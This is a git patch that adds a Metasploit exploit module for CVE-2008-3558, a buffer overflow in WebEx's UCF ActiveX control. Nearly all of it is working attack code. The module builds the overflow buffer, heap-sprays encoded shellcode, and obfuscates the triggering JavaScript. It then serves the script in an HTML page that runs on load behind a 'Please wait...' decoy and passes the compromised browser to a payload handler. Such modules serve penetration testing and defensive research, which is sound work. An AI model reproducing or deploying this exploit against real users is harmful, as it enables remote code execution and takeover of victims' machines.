From 4bd857b53ee9d8b055a0f6152c3c0e8e4ace067c Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Thu, 4 Mar 2010 17:41:26 +0000
Subject: [PATCH] add exploit module for cve-2008-3558

git-svn-id: file:///home/svn/framework3/trunk@8712 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/webex_ucf_newobject.rb    | 155 ++++++++++++++++++
 1 file changed, 155 insertions(+)
 create mode 100644 modules/exploits/windows/browser/webex_ucf_newobject.rb

diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb
new file mode 100644
index 0000000000..b2c9fcce5f
--- /dev/null
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -0,0 +1,155 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
+				ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
+				based buffer overflow will occur when copying attacker-supplied data using the
+				sprintf function.
+
+				It is noteworthy that this vulnerability was discovered and reported by multiple
+				independent researchers. To quote iDefense's advisory, "Before this issue was
+				publicly reported, at least three independent security researchers had knowledge
+				of this issue; thus, it is reasonable to believe that even more people were aware
+				of this issue before disclosure."
+
+				NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
+				into memory unmodified.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tobias Klein',     # initial discoverer
+					'Elazar Broad',     # initial discoverer
+					'Guido Landi',      # milw0rm exploit
+					'jduck'             # metasploit version
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2008-3558' ],
+					[ 'OSVDB', '47344' ],
+					[ 'BID', '30578' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/6220' ],
+					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849' ],
+					[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-009.txt' ],
+					[ 'URL', 'http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html' ],
+					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html' ],
+					[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00",
+					'DisableNops' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# Tested with atucfobj.dll v20.2008.2601.4928
+	  				[ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ],
+				],
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+
+		# ActiveX parameters
+		progid = "WebexUCFObject.WebexUCFObject"
+		clsid = "32E26FD9-F435-4A20-A561-35D4B987CFDC"
+
+		# Set parameters
+		fnname = rand_text_alpha(8+rand(8))
+		offset = 232
+
+		# Build the exploit buffer
+		sploit = rand_text_alphanumeric(offset)
+		sploit << [target.ret - 0x20000].pack('V')
+
+		# Encode variables
+		sploit = Rex::Text.to_hex(sploit, '%')
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+      # Prepare the heap spray parameters
+		spray_num = "0x%x" % target.ret
+
+		# Generate the final javascript
+		js = %Q|
+function #{fnname}()
+{
+try {
+var obj = new ActiveXObject("#{progid}");
+var my_unescape = unescape;
+var shellcode = '#{shellcode}';
+#{js_heap_spray}
+sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
+var sploit = my_unescape("#{sploit}");
+obj.NewObject(sploit);
+} catch( e ) { window.location = 'about:blank' ; }
+}
+|
+
+		# Obfuscate the javascript
+		opts = {
+			'Strings' => true,
+			'Symbols' => {
+				'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
+			}
+		}
+		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
+		js.obfuscate()
+
+		# Build the final HTML
+		content = %Q|<html>
+<head>
+<script language=javascript>
+#{js}
+</script>
+</head>
+<body onload="#{fnname}()">
+Please wait...
+</body>
+</html>
+|
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, content)
+
+		handler(cli)
+
+	end
+
+end